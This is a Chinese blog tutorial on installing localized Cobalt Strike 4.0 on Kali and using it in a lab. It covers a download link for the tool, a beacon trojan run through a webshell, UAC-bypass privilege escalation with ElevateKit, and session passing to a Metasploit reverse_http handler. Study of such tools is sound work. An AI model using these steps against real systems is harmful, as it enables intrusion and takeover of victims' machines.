Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4(1)

于 2024-05-12 22:31:55 发布
阅读量729 收藏 29
点赞数 30
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84281638/article/details/138770436
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

一、CS简单介绍

Cobalt Strike是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。
分为服务器和客户端,方便团队合作。

个人理解:
cs服务器部署在公网控制着受害者主机,而攻击者可以直接访问cs服务器进而控制受害主机,不用再通过端口转发使用msf控制受害主机,简单方便!
在这里插入图片描述

二、安装启动教程

环境要求
1、客户端,服务端都需要Java环境
2、服务端必须安装在Linux系统上

示例:
cs服务端:kaili2020
cs客户端:win10

cs服务端安装启动

原版未汉化下载 cs4.0 百度云盘:https://pan.baidu.com/s/1k4GY0IAHzdkd6PysYFxe5w,提取码:rymo
汉化版放在了我的知识星球与我的资源中

下载完cs4.0之后,将文件夹复制到 kali
执行teamserver文件,即可安装启动cs服务端

./teamserver 192.168.184.145(kali的IP) 123(密码随便设)

如下图所示即是成功启动 cs 服务端
在这里插入图片描述
cs客户端安装启动
双击cs4.0文件夹中的 cobaltstrike.exe 即可成功启动cs
在这里插入图片描述
host:cs服务端地址
port:端口默认不变
user:用户名随便写
Password:123(服务端启动时输入的密码)
之后点击Connect即可
在这里插入图片描述
cs客户端成功启动后如下图所示
在这里插入图片描述

三、Cobalt Strike 菜单介绍

1、Cobalt Strike

New Connection      #新建连接,支持连接多个服务器端
Preferences         #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization       #主要展示输出结果的视图
VPN Interfaces      #设置VPN接口
Listenrs            #创建监听器
script Manager      #脚本管理,可以通过Aggressorscripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等
close               #退出连接

2、View

Applications         #显示受害主机的应用信息
Credentials          #显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
Downloads            #查看已下载文件
Event Log            # 主机上线记录以及团队协作聊天记录
Keystrokes           #查看键盘记录结果
Proxy Pivots         #查看代理模块
Screenshots          #查看所有屏幕截图
Script Console       #加载第三方脚本以增强功能
Targets              #显示所有受害主机
Web Log              #所有Web服务的日志

3、Attacks
Packages:

HTML Application       #生成(executable/VBA/powershell)这三种原理实现的恶意木马文件
MS Office Macro        #生成office宏病毒文件
Payload Generator      #生成各种语言版本的payload
Windows Executable     #生成可执行exe木马
Windows Executable(S)  #生成无状态的可执行exe木马

Web Drive-by:

Manage                 #对开启的web服务进行管理
Clone Site             #克隆网站,可以记录受害者提交的数据
Host File              #提供文件下载,可以选择Mime类型
Scripted Web Delivery  #为payload提供web服务以便下载和执行,类似于Metasploit的web\_delivery
Signed Applet Attack   #使用java自签名的程序进行钓鱼攻击(该方法已过时)
Smart Applet Attack    #动检测java版本并进行攻击,针对Java 1.6.0\_45以下以及Java 1.7.0\_21以下版本(该方法已过时)
System Profiler        #用来获取系统信息,如系统版本,Flash版本,浏览器版本等

Spear Phish #鱼叉钓鱼邮件

4、Reporting

Activity Report                       #活动报告
Hosts Report                          #主机报告
Indicators of Compromise              #IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
Sessions Report                       #会话报告
Social Engineering Report             #社会工程报告:包括鱼叉钓鱼邮件及点击记录
Tactics, Techniques, and Procedures   #战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
Reset Data                            #重置数据
Export Data                           #导出数据,导出.tsv文件格式

5、Help

Homepage            #官方主页 
Support             #技术支持 
Arsenal             #开发者 
System information  #版本信息 
About               #关于

工具栏说明
在这里插入图片描述

四、使用教程

使用大致流程
创建团队服务器->客户端连接服务器->创建监听器->生成后门对应监听器->靶机运行后门成功上线->后渗透(提权,内网漫游,域渗透等)

4.1 Cobalt Strike ——Webshell上线CS自动提权

1、创建监听器
如下图所示
在这里插入图片描述
之后点击添加
在这里插入图片描述
在这里插入图片描述
出现下图弹窗则说明监听器设置成功,并且正在监听
在这里插入图片描述
2、生成木马
按下图所示生成Windows Executable后门木马
在这里插入图片描述
选择已生成好的监听器
在这里插入图片描述
勾选X64:目标系统是64位的话需要勾选
在这里插入图片描述
将生成的木马保存在电脑中
在这里插入图片描述
保存成功后会有如下提示
在这里插入图片描述
3、执行木马、反弹会话

**前提条件:**假设已成功植入webshell,并且通过webshell上传了后门木马artifact.exe
靶机: win7 IP:192.168.184.141
使用蚁剑连接webshell
在这里插入图片描述
在这里插入图片描述
执行artifact.exe后门文件,目标靶机成功上线
在这里插入图片描述
点击查看视图的图标,可以看到上线主机的信息为普通用户:zhxxxx
在这里插入图片描述
4、提权
CS里面含有自动化的提权
右键选择第一个,进入命令行模式(具体命令可以查看文章最下面的指令大全)
在这里插入图片描述
在这里插入图片描述
测试执行命令:getuid,稍等一会儿后会显示执行结果
在这里插入图片描述
接下来右键选择提权,如下图所示
在这里插入图片描述
默认提权的exp就下面这两个,肯定不够,所以得去加载一些提权的插件

常用的插件地址:
https://github.com/DeEpinGh0st/Erebus
https://github.com/rsmudge/ElevateKit
在这里插入图片描述
下载其中一个提权插件并保存,本示例下载的是:https://github.com/rsmudge/ElevateKit
在这里插入图片描述

如何加载插件?
如下图所示,选择脚本管理器后,会在下面弹窗提示path
在这里插入图片描述
之后选择 插件 并点击打开
在这里插入图片描述
之后点击 Unload 上传插件
在这里插入图片描述
之后再查看提权的EXP,发现增加了很多
在这里插入图片描述
接下来利用 uac-schtasks 的 exp进行提权
在这里插入图片描述

点击开始之后,可以通过命令看出正在进行攻击测试了,攻击成功的话会上线一个权限为:SYSTEM 的系统,如下图所示,即是成功提权
在这里插入图片描述

4.2 Cobalt Strike ——CS与MSF相互联动传递(Empire)

#CS->MSF
cs: spawn XXx
windows/foreign/reverse_http
MSF:
windows/meterpreter/reverse_http

#MSF->CS
MSF:
use exploit/windows/local/payload_inject
windows/meterpreter/reverse_http
CS:
windows/beacon_http/reverse_http

CS->MSF示例
前提: CS控制了靶机

首先启动kali的msf

msfconsole

在这里插入图片描述
然后设置一下payload与选项,让kali打开监听,如下图所示,正在监听是由有会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.184.145 //kali的地址
set lport 1234 
exploit

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84281638
关注
  • 30
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为客户端和服务端,服务端只有一个,大家可以共同操作shell
cobaltstrike中文版.zip
05-17
cobaltstrike中文版.zip
CS4.9.1.1-CobaltStrike4.9.1.1版
01-18
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
cobaltstrike安装加破解教程+使用教程
weixin_30580943的博客
06-17 2085
1.先安装java环境= = 1. 下载1.8u121的JAVA JDK (新的java JDK不稳定)!!原因:https://blog.cobaltstrike.com/2017/04/26/java-startup-bug-in-java-1-8u131/ (即使你安装了新的也没关系接下来你就知道了) http://www.oracle.com/technetwork/java/java...
Kali CS神器搭建
WEB渗透测试 从入门到萌新
10-18 4550
/teamserver 192.168.57.128 123456 //本机ip+密码-密码随便设置。ifconfig //查看本机IP地址 要与客户机ping得通 才可以连接。3、客户机连接 //端口默认的 用户默认 密码 输入上面的123456。mkdir cs //当前目录建一个cs目录 存放cs文件。chmod a+x ./teamserver 给权限。2、复制cs文件到kali 使用。1、jdkl环境 -kali自带。
【内网安全】——CS操作指南(一)
qq_53058639的博客
01-26 206
作者名:白昼安全主页面链接:创作初心: 一切为了她座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日emo: 再让我多赚一点——《血战网安岭》!CSCobaltStrike的简称,是一款神器,常被业界人称为CS神器。CobaltStrike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
渗透测试实战-CS工具使用_kali如何用cs网络安全0基础方法类
sfdsfgdgd的博客
04-09 825
Cobalt Strike一款以由美国redteam团队,研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具。它是一款基于java的渗透测试神器, 常被业界人称为CS, 也被戏称为“线上多人运动平台 ”。Cobalt Strike集成了端口转发、 扫描多模式端口Listener、 Windows exe程序生成、Windows dll动态链接库生成、java程序生成、 office宏代码生成, 包括站点克隆获取浏览器的相关信息等。
kali2020.4 linux 安装cobaltstrike4.2.docx
05-03
"安装 CobaltStrike 4.2 在 Kali 2020.4 Linux 中" 本文将指导您如何在 Kali 2020.4 Linux 中安装 CobaltStrike 4.2。CobaltStrike 是一种功能强大的后渗透攻击工具,广泛应用于渗透测试和红队行动中。下面将详细...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
Cobalt Strike 4.0 dist_Strike!_Cobalt_cobaltstrike_
10-02
cobalt strike distribution package 4.0
第六章-1 Cobalt Strike的基本信息介绍
划水的小白白
11-16 1498
一、简介 1.介绍 CS全程cobaltstrike,是一个后渗透工具。类似MSF,一般用来做内网渗透。 C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell。 2.优点 Payload免杀优于Msf,毕竟MSF很老了已经被各大厂商研究N遍了。 图形化界面方便操作;(在下载个中文版本的,都不要看什么教程简直) 多人协同测试,高效合作; 集成很多内网渗透攻击与命令; 可与Msf联合使用,曾经是MSF的一个模块; 3.下载安装说明, CS
Cobalt Strike 4.9.1(已更新,文章图片没换)
剁椒鱼头没剁椒的博客
03-06 1786
CSCobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
Cobalt Strike安装教程
weixin_64158899的博客
10-11 308
在linux里面开启服务,在对应的路径下输入 ./teamserver kali系统的ip地址 Cobalt Strike服务器的登录密码。然后在客户端打开对应的客户端即可使用,这里已经写好bat脚步,直接通过bat脚本启动。然后准备一个linux系统,模拟服务端,这里我使用虚拟机kali代替linux系统。然后,将对应的软件安装到对应的位置。然后就是给cs服务器相应的权限,首先要有对应的安装包。
Cobalt Strike(CS)介绍,安装及初步使用(学习笔记1)
m0_63239459的博客
03-05 3478
Cobalt Strike工具学习(新手级教程)
CS下载、安装以及简单使用
weixin_51692662的博客
11-19 3599
cs、安全
红队内网渗透神器--CobaltStrike安装教程
Aluxian_的博客
11-15 8936
CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
CobaltStrike4.1+CrossC2安装+上线Linux
Hezhoutheone的博客
08-10 2801
cs客户端:Windows10; 服务器端:腾讯云服务器 Ubuntu20;ip 1.1.1.1 (不暴露真实IP这里用1.1.1.1代替) 测试靶机:腾讯云服务器-CentOS 7 下载CrossC2 GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload ...
KaLi入门基础
热门推荐
开摆工作室(kbai.cc)
08-24 3万+
我的博客链接:https://blog.kbai.cc/ 学习KaLi ​ ????郑重声明 此文章可能会包含敏感以及危险的命令❗❗❗命令有风险,回车需谨慎。 此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!! ❌ERHE再次进行警告与提醒! ┌──( root????KaLi-Erhe )-[ ~ ] └─# cat 重要的事情说三遍 ❗❗❗ ⭕命令有风险,回车需谨慎 ❗ ⭕命令有风险,回车需谨慎
kali安装Cobalt Strike
最新发布
05-30
Kali Linux是一个基于Debian的Linux发行版,由于它具有强大的渗透测试工具,因此被广泛用于安全测试和渗透测试。Cobalt Strike是一种功能强大的渗透测试框架,可以用于远程控制和攻击模拟。在Kali Linux中安装Cobalt Strike可以通过以下步骤实现: 1. 下载Cobalt Strike安装包,这里假设你已经有了安装包 2. 打开终端并切换到Cobalt Strike安装包所在目录 3. 解压缩安装包:`tar -xvf cobaltstrike-trial-dist.tar.gz` 4. 进入Cobalt Strike目录:`cd cobaltstrike` 5. 启动Cobalt Strike:`./teamserver <IP address> <password> <cobalt strike profile>`,其中IP地址为你的监听地址,密码为你要设置的密码,cobalt strike profile是一个可选参数,用于指定配置文件路径。 当你成功启动Cobalt Strike后,你就可以使用其强大的功能进行渗透测试了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值